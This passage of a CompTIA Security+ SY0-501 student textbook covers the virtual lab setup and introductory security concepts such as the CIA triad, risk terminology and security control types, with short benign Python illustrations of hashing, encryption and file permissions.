
Instructor-Led Training

CompTIA Security+ Certification


SY0-501

Student Edition

✓ Maps to CompTIA Security+


objectives for the SY0-501 exam
✓ Realistic, simulated lab exercises
✓ Downloadable ancillaries at 30bird.com

SECP0501-R13-SCC
CompTIA Security+ Certification SY0-501
Student Edition

30 Bird Media
510 Clinton Square
Rochester NY 14604
www.30Bird.com
CompTIA Security+ Certification SY0-501
Student Edition

CEO, 30 Bird Media: Adam A. Wilcox


Series designed by: Clifford J. Coryea, Donald P. Tremblay, and Adam A. Wilcox
Managing Editor: Donald P. Tremblay
Instructional Design Lead: Clifford J. Coryea
Instructional Designer: Robert S. Kulik
Keytester: Kurt J. Specht

COPYRIGHT © 2017 30 Bird Media LLC. All rights reserved.


No part of this work may be reproduced or used in any other form without the prior written consent of the
publisher.
Visit www.30bird.com for more information.

Trademarks
Some of the product names and company names used in this book have been used for identification purposes
only and may be trademarks or registered trademarks of their respective manufacturers and sellers.

Disclaimer
We reserve the right to revise this publication without notice.

SECP0501-R13-SCC
Table of Contents

Introduction .................................................................................................................................... 1
Course setup ................................................................................................................2

Chapter 1: Security fundamentals ............................................................................................... 7


Module A: Security concepts ......................................................................................8
Module B: Risk management ....................................................................................22
Module C: Vulnerability assessment .........................................................................35

Chapter 2: Understanding attacks ............................................................................................. 47


Module A: Understanding attackers ..........................................................................48
Module B: Social engineering ...................................................................................52
Module C: Malware ..................................................................................................63
Module D: Network attacks ......................................................................................72
Module E: Application attacks ..................................................................................94

Chapter 3: Cryptography ........................................................................................................... 115


Module A: Cryptography concepts .........................................................................116
Module B: Public key infrastructure .......................................................................144

Chapter 4: Network fundamentals ...........................................................................................161


Module A: Network components ............................................................................162
Module B: Network addressing ..............................................................................182
Module C: Network ports and applications ............................................................194

Chapter 5: Securing networks .................................................................................................. 213


Module A: Network security components ..............................................................214
Module B: Transport encryption .............................................................................236
Module C: Hardening networks ..............................................................................259
Module D: Monitoring and detection ......................................................................267

Chapter 6: Securing hosts and data ........................................................................................287


Module A: Securing data .........................................................................................288
Module B: Securing hosts .......................................................................................308
Module C: Mobile device security ..........................................................................324

Chapter 7: Securing network services .....................................................................................337


Module A: Securing applications ............................................................................338
Module B: Virtual and cloud systems .....................................................................354

Chapter 8: Authentication ......................................................................................................... 369
Module A: Authentication factors ...........................................................................370
Module B: Authentication protocols .......................................................................382

Chapter 9: Access control ........................................................................................................ 403


Module A: Access control principles ......................................................................404
Module B: Account management ............................................................................417

Chapter 10: Organizational security ........................................................................................439


Module A: Security policies ....................................................................................440
Module B: User training .........................................................................................457
Module C: Physical security and safety ..................................................................461

Chapter 11: Disaster planning and recovery ...........................................................................475


Module A: Business continuity ...............................................................................476
Module B: Fault tolerance and recovery .................................................................481
Module C: Incident response ..................................................................................493

Appendix A: Glossary................................................................................................................ 503

Alphabetical Index...................................................................................................................... 517

Introduction
Welcome to CompTIA Security+ SY0-501. This course provides the basic knowledge needed to plan,
implement, and maintain information security in a vendor-neutral format. This includes risk management,
host and network security, authentication and access control systems, cryptography, and organizational
security. This course maps to the CompTIA Security+ certification exam. Objective coverage is marked
throughout the course, and you can download an objective map from http://www.30bird.com.
You will benefit most from this course if you intend to take the CompTIA Security+ SY0-501 exam.
This course assumes that you have basic knowledge of using and maintaining individual workstations.
Knowledge equivalent to the CompTIA A+ certification is helpful but not necessary.
After completing this course, you will know how to:
 Correctly use fundamental security technology, conduct risk assessments, and plan vulnerability
assessments.
 Recognize common attacks including social engineering, malware, network attacks, and application
attacks.
 Identify fundamental network components and technologies, understand network addresses, and
recognize common network ports and applications.
 Identify common network security components and secure transport protocols, harden networks, and
apply monitoring and detection techniques.
 Explain common cryptographic techniques and standards, identify public key infrastructure concepts,
and apply transport encryption.
 Apply security controls to data, hosts, and mobile devices.
 Plan secure web applications and virtual services.
 Explain authentication factors and understand network authentication protocols.
 Recognize access control models, apply file-level access control, and centrally manage account
security.
 Apply operational security techniques through organizational policies, user training, and physical
security controls.
 Plan for disaster through business continuity plans, fault tolerant systems, data backups, and incident
response policies.


Course setup
To complete this course, each student will need a Windows client and server connected by a router that is in
turn connected to the internet, along with two specialized Linux installations; in practice, all of these run as
virtual machines on a single host computer. Setup instructions and exercises assume that the host computer will
be running Oracle VirtualBox, and that the virtual machines will be one Windows 7 workstation, one Windows
Server 2012, and a pfSense router for the primary network. There are also two specialized Linux VMs, Web
Security Dojo and Kali Linux, both of which connect directly to the network and run independently.
Hardware requirements for the host computer include:
 1.3 GHz 64-bit processor with AMD-V or Intel VT-x support (multi-core recommended)
 8 GB RAM
 100 GB total hard drive space
 DirectX 9 video card or integrated graphics, with a minimum of 128 MB of graphics memory
 A monitor with 1024x768 or higher resolution (1280x800 or higher recommended)
 Wi-Fi or Ethernet adapter

Host computer software requirements include:


 64-bit Windows or Linux
 Oracle VM VirtualBox 5.1.22 or newer.
 The Security+ SY0-501 virtual lab environment, available at http://www.30bird.com
 Five virtual machine files for VirtualBox, with links available in the setup instructions
 7-Zip for extracting the virtual machine files, available at http://www.7-zip.org/

Because the exercises in this course involve changing operating system defaults, it is recommended that each
class begin with a fresh installation of the virtual machines. If the same installation has been used for a
previous class, some exercises will not work as written.

Note: Since the host machine is used only for running the virtual environment, it doesn't need to be
reinstalled for each subsequent class.

1. On the host computer, install the operating system complete with all updates and service packs.
2. Install 7-Zip on either the host computer or whichever computer will extract the virtual machine files.
3. Download the VMs using the following links:
a) downloads.30bird.com/sec_plus_501/501-win7-vbox.7z
b) downloads.30bird.com/sec_plus_501/501-win2012-vbox.7z
c) downloads.30bird.com/sec_plus_501/501-pfsense-vbox.7z
d) downloads.30bird.com/sec_plus_501/501-kali-vbox.7z
e) downloads.30bird.com/sec_plus_501/501-dojo.7z
4. Extract the virtual machine files and copy them to a folder on the host computer. Each should be a single
.ova file.
5. Install Oracle VM VirtualBox, accepting all defaults during setup.
6. In VirtualBox Manager, click File > Preferences.


7. Add two host-only virtual networks. (A scripted alternative using the VBoxManage command line is
sketched after these setup steps.)
a) In the Network section, click the Host-only Networks tab.
b) Click Add twice to add two networks.
By default, they will be named VirtualBox Host-Only Ethernet Adapter and VirtualBox Host-Only
Ethernet Adapter #2. Each installs a virtual Ethernet card on the host computer.
8. Configure the first host-only network.
a) On the Host-only Networks tab, select the network and click Edit.
b) Edit the IPv4 Address to read 10.10.10.40.
c) Set the IPv4 Network Mask field to 255.255.255.0.
d) On the DHCP Server tab, verify that Enable server is cleared.

e) Click OK.
9. Configure the second host-only network.
a) On the Host-only Networks tab, select the network and click Edit.
b) Edit the IPv4 Address to read 10.10.20.40.
c) Set the IPv4 Network Mask field to 255.255.255.0.
d) On the DHCP Server tab, verify that Enable server is cleared.
e) Click OK.
10. Import each VM into VirtualBox.
a) In VirtualBox Manager click File > Import Appliance.
b) In the import wizard, select the .ova file you want to import, then click Next.
c) Repeat for all VMs.
11. Configure network settings for the pfSense VM.
Since pfSense serves as the in-class router, it's very important that each adapter connect to the right
virtual network. The adapter settings might not always import reliably, so be sure to verify all three.
a) In VirtualBox Manager, click the pfSense VM, then click Settings.
b) In the Network section, configure the Adapter 1 tab as follows:
• Enabled and attached to Host-only Adapter
• Name: VirtualBox Host-Only Ethernet Adapter #2
• MAC Address: 000C29C6C1C7 (For verification, do not edit this.)


c) Configure Adapter 2 as follows:


• Enabled and attached to Bridged Adapter
• MAC Address: 000C29C6C1D1 (For verification, do not edit this.)

d) Configure Adapter 3 as follows:


• Enabled and attached to Host-only Adapter
• Name: VirtualBox Host-Only Ethernet Adapter
• MAC Address: 000C29C6C1DB (For verification, do not edit this.)

12. Configure adapters for the other VMs.


Each of these has only one active NIC, so you just need to make sure they connect to the right network.
• Windows 7: VirtualBox Host-Only Ethernet Adapter, attached to Host-Only Adapter
• Windows Server 2012: VirtualBox Host-Only Ethernet Adapter, attached to Host-Only Adapter
• Kali: Attached to NAT
• Dojo: Attached to NAT
13. For Windows Server 2012, configure a shared "Backups" folder anywhere on the host computer.
a) Create the folder on the host computer.
b) In VirtualBox, select Windows Server 2012 then click Settings.
c) Click Shared Folders, then click the Add new shared folder button.
d) In the Folder Path field, navigate to the Backups folder.


e) Click OK.
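
If you'd rather script parts of this setup, the same operations are exposed through VirtualBox's VBoxManage
command-line tool. The following Python sketch is not part of the official setup instructions; it simply shells
out to VBoxManage to create a host-only interface, assign the first network's address, and import an appliance
file. The interface name and file path shown are assumptions; substitute the values VBoxManage reports on your
host, and verify the results in VirtualBox Manager as described in the steps above.

    import subprocess

    def vbox(*args):
        """Run a VBoxManage command and return its output (VBoxManage must be on the PATH)."""
        result = subprocess.run(["VBoxManage", *args], check=True,
                                capture_output=True, text=True)
        return result.stdout

    # Create a host-only interface. VBoxManage prints the name it assigned, such as
    # "vboxnet0" on Linux or "VirtualBox Host-Only Ethernet Adapter" on Windows.
    print(vbox("hostonlyif", "create"))

    # Give the first classroom network its address (repeat with 10.10.20.40 for the second).
    # Replace "vboxnet0" with the interface name reported above.
    vbox("hostonlyif", "ipconfig", "vboxnet0",
         "--ip", "10.10.10.40", "--netmask", "255.255.255.0")

    # List the host-only interfaces to confirm the settings; DHCP should stay disabled (step 8).
    print(vbox("list", "hostonlyifs"))

    # Import one of the extracted appliances (hypothetical path; adjust to your download folder).
    vbox("import", "C:/VMs/501-win7-vbox.ova")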

You will need login credentials for the VMs. They are as follows:
Windows 2012/Windows 7 (Domain)    Username: Administrator    Password: P@ssw0rd

Note: You may be prompted to change the password on first login.

Windows 7 (Local)    Username: Administrator    Password: P@ssw0rd

Note: You probably won't need to use local login for Windows 7.
Use Domain login for all classroom exercises.

pfSense    Username: Admin    Password: pfsense

Kali Linux    Username: root    Password: toor

Chapter 1: Security fundamentals
You will learn:
 Basic security concepts
 How to calculate and manage risk
 How to find vulnerabilities


Module A: Security concepts


Information security is a rapidly growing and evolving field, but security itself is a topic as old as human
society. While the workings of specific attacks on networks and data might be something only a skilled
technician can fully understand and counteract, many of the principles behind securing your organization's
assets don't require any special background to understand or enforce. It's important to comprehend these basic
principles and the related terminology before you move on to the technical knowledge required of a security
professional.
You will learn:
 About the CIA triad
 How to distinguish risks, threats, and vulnerabilities
 About security controls
 How to distinguish events and incidents

About assets and threats


A lot of security discussion focuses on the many dangers faced by organizations, and for good reason, but first
it's important to understand just what's being threatened. Security is the practice of protecting assets from
anything that might do them harm. An asset can be anything of value to your organization: while information
security focuses on sensitive data and communications, overall organizational security must also consider
assets such as employees, physical property, and business relationships. Failure to protect critical assets can
be disastrous; in today's world data breaches alone can bankrupt companies, ruin lives, or lose wars.
By contrast, a threat is anything that can do harm to an asset. Security focuses largely on preventing malicious
attacks such as malware, hackers, thieves, or disgruntled employees, but those are not the only kinds of
threats. Others include accidental data loss, equipment failures, fire, natural disasters, and anything else that
can disrupt business operations. For this reason, information security experts must also work closely with
physical security personnel, computer and network technicians, safety officers, and anyone else who guards
organizational assets.
The value of an asset can greatly exceed its initial cost or even its replacement cost. Imagine if someone broke
into your office over the weekend to steal a bunch of computers and network devices. Even assuming the
thieves only stole hardware without important data, you wouldn't just have to buy new equipment and pay for
the man-hours required to set everything up again. The time needed would likely disrupt your business
operations, not only costing you revenue but possibly undermining the trust your customers and business
partners have in your timeliness and reliability. Beyond that, some assets can't be replaced at all, such as a
human life or even possession of a secret.
At the same time, you shouldn't take this general terminology to mean that all types of assets and security are
equivalent. Information security is an important field specifically because informational assets, and the threats
to them, have a number of unique properties. Physical assets can generally be stolen or destroyed only by
breaching physical security; by contrast, today's networking makes it possible for an attacker to access your
organization's sensitive information from anywhere in the world. Additionally, since information—even
information stored on physical media—isn't a physical object, it can be copied, moved, or deleted. If someone
steals your credit card, you'll know as soon as you look in your wallet. But if someone steals your credit card
information, you might not know until you see your monthly statement, and even then only if you're diligent
enough to notice the unauthorized transactions. The unique properties of data assets, and the rapid evolution
of information technology, are why information security has become such a booming field.


The CIA triad


The core of information security is commonly summed up in three components, known as the CIA triad.
Designing networks and data systems with all three components in mind doesn't just protect them against
known threats; it also makes them less vulnerable to unknown dangers.

Confidentiality Ensuring that information is viewable only by authorized users or systems, and is either
unreadable or inaccessible to unauthorized users. Confidentiality is most important for
obviously sensitive information, but even information that isn't secret in itself might be
valuable to attackers who wish to compromise your organization.
Integrity Ensuring that information remains accurate and complete over its entire lifetime. In
particular, this means making sure that data in storage or transit can't be modified in an
undetected manner, but it can encompass all methods of preventing data loss.
Availability Ensuring that information is always easily accessible to authorized users. In addition to
preventing deliberate or accidental data loss, this means making sure that connectivity and
performance are maintained at the highest possible level, and that security controls aren't
overly cumbersome for legitimate users.

You might have noticed that all three of these are goals of IT professionals even when they don't have any
secrets to keep; availability and integrity are important in any sort of data storage or transmission, and
network performance management is largely about making sure information doesn't go anywhere it doesn't
need to be. While basic functionality goals focus on how equipment failures, unintended system behavior, or
user error can affect the network, security goals also explicitly aim to defend against harm caused by
eavesdroppers, attackers, and other malicious actors.
The CIA triad is popular, but it's not all-encompassing. Some security experts suggest adding other core
principles. A common one is authenticity or trustworthiness, the ability to verify the source of information as
well as its integrity. Other sources simply consider this part of integrity. Likewise, while many sources would
count privacy, or control of personal information of users or customers, as a part of confidentiality, there are
others who count it as distinct enough to be its own category.
Other security concepts discussed along with the CIA triad are more clearly distinct since they focus on more
than the information itself. A popular addition in recent years is accountability, ensuring that employee
actions with security ramifications are tracked so they can be held accountable for inappropriate activities.
Related to this is non-repudiation, in which authenticity is verified in such a way that even the information's
author can't dispute creating it. Safety isn't usually added directly to the CIA triad, but it's closely aligned with
security principles and often discussed in similar terms.


Risk, threats, and vulnerabilities


Terms used to describe security challenges include risks, threats, and vulnerabilities. In casual discourse, the
three might be used imprecisely, or even interchangeably; however, while they're definitely related concepts,
in security awareness they mean very different things.

Risk The chance of harm coming to an asset. Risk measurements can incorporate any combination
of the likelihood of harm, the impact it will have on the organization, and the cost of repairing
any resulting damage. Risk evaluation is essential in determining where and how security
resources should be deployed.
Threat Anything that can cause harm to an asset. These include not only attacks carried out by
malicious actors but also human error, equipment malfunction, and natural disaster. The
mechanism of a particular threat is called a threat vector or attack vector—for example,
common threat vectors can include malware, fraudulent email messages, or password
cracking attempts.
Vulnerability Any weakness the asset has against potential threats. Vulnerabilities can be hardware based,
software based, or human/organizational. Likewise, they can represent errors or shortcomings
in system design, or known trade-offs for desired features. Many attacks are exploits targeting
specific vulnerabilities known to the attacker.

Identifying threats, minimizing vulnerabilities, and calculating risks are all broad and important topics that a
security expert needs to study in depth, and the three are tightly intertwined. The end goal of security is to
minimize risk to critical assets, but in order to estimate all the risks to your assets you first need to know
which threats you are likely to face and where your organization is vulnerable.
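
Module B introduces formal risk calculations, but even a rough model shows how these terms fit together. The
sketch below is a simplified illustration rather than a method from this course: each hypothetical scenario is
scored by multiplying the estimated likelihood of a threat succeeding against a vulnerability by the estimated
impact on the asset, so limited security resources can be aimed at the highest scores first.

    # Toy risk ranking: risk = likelihood x impact, each estimated on a 1-5 scale.
    # The assets, threats, and numbers below are invented purely for illustration.
    scenarios = [
        {"asset": "customer database", "threat": "SQL injection", "likelihood": 4, "impact": 5},
        {"asset": "lobby kiosk",       "threat": "theft",         "likelihood": 2, "impact": 1},
        {"asset": "backup tapes",      "threat": "fire",          "likelihood": 1, "impact": 4},
    ]

    for s in scenarios:
        s["risk"] = s["likelihood"] * s["impact"]

    # Highest scores first: these are the scenarios that most need security controls.
    for s in sorted(scenarios, key=lambda s: s["risk"], reverse=True):
        print(f"{s['asset']:18} {s['threat']:14} risk score = {s['risk']}")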

Security standards organizations


Security, and especially information security, is a community effort. Organizations of all sorts make use of the
same technologies and face many of the same threats, so learning from each other's successes and failures is
the best way to keep ahead of ever-advancing attacks and technological challenges. It's not just a matter of
swapping stories either; by using shared, proven standards for technology and policy, and a common language
for theoretical discussion, it's much easier for security professionals to share their techniques and strengthen
their own defenses.
A wide variety of organizations share security related information and standards, either as a central mission or
as one function among many. Some are government organizations, others are industry or trade groups, still
others are security consultants or software vendors, and some are independent associations of security
professionals. These organizations and their standards frequently appear in security literature as somewhat
mysterious acronyms, so you should learn to recognize them. Here are a few you're likely to encounter:

CIS The Center for Internet Security is a non-profit organization formed by a large number of
commercial, academic, and governmental bodies. The CIS's mission is to identify, develop, and
promote best practices in cybersecurity. To this end, it develops security benchmarks and
assessment tools for a wide variety of operating systems and network applications.
IEEE The Institute of Electrical and Electronics Engineers is a professional association of engineers and
scientists of many disciplines. Most relevant to information security, it includes computer
scientists, software developers, and IT professionals. The IEEE's mission is to advance
technological innovation of all sorts; one of the most visible aspects of their work is the global
IEEE standards published in a number of technological fields. One family you're likely familiar
with is the IEEE 802 networking standards, such as Ethernet (802.3) and Wi-Fi (802.11).


IETF The Internet Engineering Task Force began with the US government agencies that first developed
TCP/IP, but it is now an open standards organization under the management of the Internet Society
(see below). All of its members are volunteers, and there are no formal membership requirements.
The IETF develops internet standards by consensus, distributing numbered Request For Comments
(RFC) documents via its internal mailing lists. A specification that advances through the review
process is classified as a Proposed Standard, and finally an Internet Standard. Not all common
protocols used on the internet are IETF standards, but a great many are.
ISO The International Organization for Standardization comprises the standards bodies of over 160
member nations. ISO standards include everything from the OSI network model (ISO/IEC 7498-1)
to twist direction in yarn (ISO 2), and many involve information technology or security standards
and practices.
ISOC The Internet Society is the parent organization of the IETF and several other organizations and
committees involved in internet development. The ISOC doesn't directly develop standards itself:
instead, it focuses primarily on providing corporate management services for its member
organizations, speaking on their behalf in internet governance discussions, and organizing internet-
related seminars, conferences, and training programs.
ITU The International Telecommunication Union is a UN agency charged with global tasks related to
telecommunications. It allocates shared global use of the radio spectrum, coordinates national
governments in assigning satellite orbits, and promotes global technical standards related to
networking and communication. Many ITU standards can be recognized by their "letter-period-
number" format; two you might have heard of are X.509 (Digital certificates) used by secure
websites, and H.264 (MPEG-4) used for digital video encoding both on the internet and by
television providers.
NIST The National Institute of Standards and Technology is a US government agency charged with
developing and supporting standards used by other government organizations. While it primarily
promotes standards for use by the US government, they frequently are used by others with similar
technology needs. In recent years, computer security standards have become a major part of its
mission. NIST shares most of its findings with the security community in general, and regularly
publishes information about known software vulnerabilities and security best practices.
NSA The National Security Agency is a US signals intelligence organization whose responsibilities
include information gathering, codebreaking, and codemaking. The NSA develops cryptographic
standards and secures government information against attack. While much of its work is classified,
the NSA has had a role in designing and standardizing some of the most widely used cryptographic
standards, such as DES, AES, and SHA.
W3C The World Wide Web Consortium is a standards organization founded to develop and maintain
interoperable standards for the World Wide Web (WWW) used by web browsers and servers as well
as other technologies. W3C standards include HTML, XML, CSS, and many others used for web-
based communications. While the W3C doesn't focus on security technologies per se, security of
web standards is a major topic in the wider field of information security.

To make things more complicated, a given technology might exist as a standard from multiple organizations
at once and thus have multiple designations. You'll need to be familiar with the most common security
standards, but there are so many that even the most experienced security professional has to stop and look
them up sometimes.


Alice and Bob


Every technical field has examples of nicknames and other jargon that aren't technically defined but still
provide a common language for students and experts alike to communicate about an important concept. In
cryptography, and secure communications in general, you should get to know "Alice and Bob" as well as their
many associates. Alice and Bob are placeholder names for "Party A" and "Party B," humans or computer
programs trying to communicate with each other. In the typical example, Alice wants to send Bob a secure
message. Other common placeholder names represent other parties in the communication, malicious
attackers, neutral observers, and helpful assistants.

Note: Alice and Bob themselves first appeared in papers published by cryptographer Ron Rivest in
1977-1978, and the rest of the cast developed over time. Many were introduced or "standardized" in the
1994 book Applied Cryptography by Bruce Schneier.

 Additional participants follow with names in alphabetical order: Carol (C), Dave (D), Erin (E), Frank
(F), and so on.
 Some other names represent malicious participants: Eve the eavesdropper, Craig the password cracker,
or Mallory who modifies data in transit.
 Additional names vary by source and the protocol being discussed. In general, the name (or at least its
first letter) indicates that person's role.

Discussion: Security concepts


1. Consider a network service you use regularly, such as email. How could its confidentiality be
compromised?
One example could be someone reading or intercepting it: if email is not encrypted, it's transported in clear
text, and any third party who intercepts it can read it.

2. How could its integrity be compromised?


Mail could be altered when you send or receive it; for example, a man-in-the-middle who intercepts a message
can modify it and pass it on to the recipient.
3. How could its availability be compromised?
You could be unable to access your mail when you need to; for example, an attacker could perform a DoS or
DDoS attack against the mail server, shutting it down so that no mail can be delivered.

4. There's been a rash of burglaries in your area, and you notice that one door into part of the building with
valuable equipment has a keypad lock set to "12345." Identify the asset, the vulnerability, the threat, and
the risk in the situation.
The asset is the valuable equipment in the building. The vulnerability is an easily guessed access code
that makes the lock simple to bypass. The threat is burglars in the area. The risk is the combination of
how likely you are to be burglarized, how hard stolen equipment would be to replace, and how much its
loss would otherwise affect your business.
5. You've set a stronger passcode and added a security alarm. How does this affect the vulnerability, threat,
and risk of the situation?
Strengthened or added security measures reduce vulnerabilities, which in turn reduces risk. In this case,
the threat is unchanged: the burglars are still out there, just less likely to enter unnoticed, and perhaps
deterred from trying at all by the added difficulty of reaching the equipment.

Security controls
The tools and measures used to achieve security goals are called security controls. A security control can be
anything that protects your assets: the network firewall, the locks on your doors, even the company policy on
data backups. There are multiple ways to categorize the wide range of controls used by modern organizations.
One way is to categorize a control by the goal it furthers, such as confidentiality, integrity, or availability.
Other categorizations focus on the control's functional nature, or simply on how it acts.

Exam Objective: CompTIA SY0-501 5.7.1, 5.7.2, 5.7.3, 5.7.4, 5.7.6, 5.7.7, 5.7.8
A control's functional nature can fall into three or four general categories, depending on how it works and
who implements it.

Administrative Also known as procedural or management controls, these represent organizational
policies and training regarding security. Management controls define the other control
types in use by an organization, so they're the starting point for implementing security.
Common management controls include password policies, employee screening, training
procedures, and compliance with legal regulations.
Technical Technological solutions used to enforce security, sometimes also called logical controls.
Technical controls include firewalls, authentication systems, and encryption protocols,
among others. In modern data systems, technical controls do a great amount of the work
and require the most exacting knowledge, but they're still only as effective as the human
activities behind their implementation and enforcement.
Operational Day-to-day employee activities that are used to achieve security goals. These are often
defined by policies but are effective only in the proper execution of secure practices.
Operational controls include backup management, security assessments, and incident
response.
Physical Methods used to guarantee the physical security and safety of organizational assets.
Physical controls can include locks, fences, video surveillance, and security guards.

You can also classify a control according to when it acts.

Preventive Proactive controls that act to prevent a loss from occurring in the first place. Preventive controls
include locked doors, network firewalls to block intrusion, and policies designed to minimize
vulnerabilities. Ideally, preventive controls work well enough that the other types are just
backup, but since that's not likely in the real world you can't ignore the others.
Detective Monitoring controls that either detect an active threat as it occurs, or record it for later
evidence. Either way, detective controls primarily serve to notify security personnel who can
take preventive or corrective measures, rather than secure assets themselves. Common detective
controls include security cameras, network logs, auditing policies, and physical or network
alarms.


Corrective Follow-up controls used to minimize the harm caused by a security breach and to prevent its
recurrence. Corrective controls include measures such as restoring data from backups, changing
compromised passwords, or patching vulnerable systems. Ideally, a corrective control leaves
the system more secure than it was before the threat occurred.
Deterrent Visible controls designed to discourage attack or intrusion, especially in physical security. A
locked door might be a preventive control and a security camera a detective one, but the "NO
TRESSPASSING" sign and the visibility of the camera might be what actually convinces a
casual attacker not to go in even if the door is unlocked. Deterrent controls also include
disciplinary policies or training used to discourage employees from ignoring proper security
practices out of convenience.

A given security system can act on multiple levels. For example, a visible camera is both deterrent and
detective, while an authentication system that responds to failed logins by locking the account and notifying
an administrator is preventive and detective.
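
To see how a single control can occupy several categories at once, here is a small illustrative sketch in
Python (the controls and labels below are examples invented for this illustration, not an official taxonomy):

    # Each control is tagged with its functional nature and the time(s) at which it acts.
    controls = {
        "visible security camera": {"nature": "physical",
                                    "timing": ["deterrent", "detective"]},
        "account lockout with admin notification": {"nature": "technical",
                                                     "timing": ["preventive", "detective"]},
        "data backup policy": {"nature": "administrative",
                               "timing": ["corrective"]},
    }

    for name, info in controls.items():
        print(f"{name}: a {info['nature']} control that acts as {' and '.join(info['timing'])}")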

Confidentiality controls
Every organization has sensitive data. Even if yours doesn't have trade secrets or customer information that
are valuable assets in themselves, it almost certainly has private employee data, or even security configuration
settings that can be used to bypass your other security controls. Keeping this data out of the wrong hands is a
primary goal of information security, so many controls are designed just for this purpose.
Many of the most effective confidentiality controls aren't technological, but rather policy-based. By
controlling where data is kept, and who has access to it, you can reduce its exposure in the first place. Some
important confidentiality policy principles include the following.

Least privilege Users are given only the permissions they need to perform their actual duties. Think of it
like not giving every employee the key to every lock in the building: the maintenance staff
doesn't need to get into the financial filing cabinet, and the accountants don't need to get
into the mechanical room. This not only prevents harm by malicious employees, it also
reduces the opportunities for an outside attacker to steal a particular key. In cybersecurity,
least privilege can be enforced on the human level by policies, or on the technical level by
system or account permissions. (A brief file-permission sketch follows this table.)
Need to know Similar to least privilege but focused on restricting data access to only those individuals
who actually need it. Need to know includes restricting who can access a particular sort of
data in the first place, but it doesn't stop there. Even when users have permission to access
data of a certain type and sensitivity, a need-to-know policy can restrict them to specific
information and records that they actually need, rather than allowing casual browsing that
might lead to security risks.
Separation of duties Breaking critical tasks into components, each of which is performed by a different
employee with different permissions. When handling sensitive data this can work
counterintuitively, since it brings more people into managing secrets, but it also limits the
damage a single dishonest or careless employee can do without being discovered by others
involved in the process. Separation of duties can apply to technological systems as well as
people—that way a security compromise in one component can do less damage.
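
On the technical level, least privilege often comes down to file and account permissions. As a minimal sketch
(not a course exercise), the following Python snippet restricts a sensitive file so that only its owner can read
or write it on a Unix-like host; the file name is hypothetical, and on Windows the same idea would be enforced
through NTFS permissions instead.

    import os
    import stat

    sensitive = "payroll.csv"   # hypothetical file used only for this illustration

    with open(sensitive, "w") as f:   # create a placeholder file to demonstrate against
        f.write("employee,salary\n")

    # Owner may read and write; group and others get no access at all (mode 0o600).
    os.chmod(sensitive, stat.S_IRUSR | stat.S_IWUSR)

    print(oct(stat.S_IMODE(os.stat(sensitive).st_mode)))   # expect 0o600 on Unix-like systems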

Technical confidentiality controls are increasingly common, especially as networks have become such a vital
part of information technology. Systems accessible from the internet, or information transmitted over it, create
significant new challenges for confidentiality.


Access controls Restrict access to systems and other resources, typically by means of a password, smart
card, or other authentication method. Secure access control systems not only prevent
unauthorized access, they also enforce user permissions for authorized users and log
activity for later review.
Encryption Uses mathematical processes to render data unreadable to those without the proper
decryption key. Encryption is widely used to secure communications, but there are many
technological challenges involved in making sure it really is secure. (A short sketch
follows this table.)
Steganography The practice of concealing a secret message inside a more ordinary one—for example, a
hidden watermark used to show a document's origin should it be stolen or copied. The
hidden message itself might be encrypted as well, or it might rely simply on being hard to
discover in the first place.
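
To make encryption a little more concrete, here is a minimal sketch (not one of the course labs) using the
third-party Python cryptography package, which is assumed to be installed. A symmetric key is generated, a
message is rendered unreadable, and only a holder of the same key can recover it.

    # Requires the third-party package:  pip install cryptography
    from cryptography.fernet import Fernet

    key = Fernet.generate_key()       # keep this secret; anyone holding it can decrypt
    cipher = Fernet(key)

    token = cipher.encrypt(b"Quarterly results: do not distribute")
    print(token)                      # unreadable ciphertext, safe to store or transmit

    print(cipher.decrypt(token))      # recovers the original message, but only with the key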

Integrity controls
Even when data isn't confidential, you need to make sure it isn't deleted or changed, either by an attacker or
just by technical or user error. As with confidentiality, policies and permissions are a big part of this, but
reliably detecting data changes on digital systems is difficult without the right technical controls.

Hashing Mathematical functions designed to create a small, fixed-size fingerprint of a given
message or file, such that any small change in the original data will produce an entirely
different hash. Some hashes are only designed to protect against accidental data changes,
while others are cryptographic formulas intended to foil malicious modifications. (See
the short sketch after this table.)
Digital signatures A combination of hashing and other cryptography used not only to demonstrate that a
message hasn't been altered, but to verify the authenticity of its creator. Digital
signatures can be used to create digital authentication tools called certificates, and can be
used as a method of non-repudiation in much the same way that a physical signature can.
Backups When data is changed or lost, regular and complete backups can be used to restore it to
its original form. Effective backup systems require policies governing what is backed up
and when, technical methods for the process itself, and security controls to protect the
data in the backup copy.
Version control Storing multiple versions of files meant for frequent and collaborative change, such as
documents, code repositories, and other collections of documents. Version control
systems don't prevent data from being changed or deleted, but automatically track
changes and allow easy reversion to the original state.
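
As a quick illustration of hashing, the minimal sketch below (standard-library Python, not a course exercise)
shows how changing a single character of a message produces a completely different SHA-256 fingerprint, which
is what makes undetected modification so difficult.

    import hashlib

    original = b"Pay $100.00 to Alice"
    tampered = b"Pay $900.00 to Alice"   # a one-character change

    print(hashlib.sha256(original).hexdigest())
    print(hashlib.sha256(tampered).hexdigest())
    # The two digests bear no resemblance to each other, so comparing a stored hash
    # against a freshly computed one immediately reveals that the message was altered.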

Availability controls
It's costly when your organization's data and other resources aren't available to those who need them, when
they need them. Apart from any other harm done by a security incident, the more it disrupts your business
operations the more harm it will do. In fact, many attacks are designed to do damage solely by targeting
availability.
There are a number of security controls used to enhance availability both during routine operations, and
during or after attacks or system errors. Exactly how aggressive these controls need to be depends on how
critical a resource's availability is.

Note: Availability is typically described in the percentage of the time a system or resource is expected to
be operating and responsive. For example, a high availability system rated for 99.999% availability (or
"five nines") should be down no more than 5.26 minutes per year.
Many availability controls work by removing a single point of failure, any component which can disrupt
overall system functions if it fails.


Redundancy Multiple or backup systems arranged so that if one fails, others can take its place immediately
or at least more quickly than the original can be repaired. Redundancies can include multiple
identical servers able to perform the same function, backup systems that can be quickly
brought online, or even entire backup sites for use in case of natural disaster. Redundant
systems typically have manual or automatically triggered failover features which allow
functions to switch from a failed system to its backup in a way that's transparent to the user.
Fault tolerance A system designed to continue functioning if a hardware or software component fails. Often
this is done via redundant components: for example, RAID storage uses multiple redundant
disks so that if one fails it can be replaced without data loss or even interrupting operations.
Other fault tolerant systems include software that will automatically resume operations after
encountering errors, and backup electrical power sources such as UPS or generators.
Patch management Whether security and stability updates are being applied proactively or in response to a
security incident, it's important to make sure they don't disrupt system availability. Some
patches, often known as hotfixes, can be applied to a system with no or minimal downtime.
Otherwise, to maximize availability you can schedule downtimes to coincide with low usage
periods.

Compensating controls
One other control type is the compensating control. This is more of a regulatory term than a description of how
or where the control works. Sometimes security requirements, especially from regulatory agencies, will
specify controls that your specific system configuration or field of business makes impossible or impractical,
at least until your next major upgrade. A compensating control is an alternative control that doesn't match the
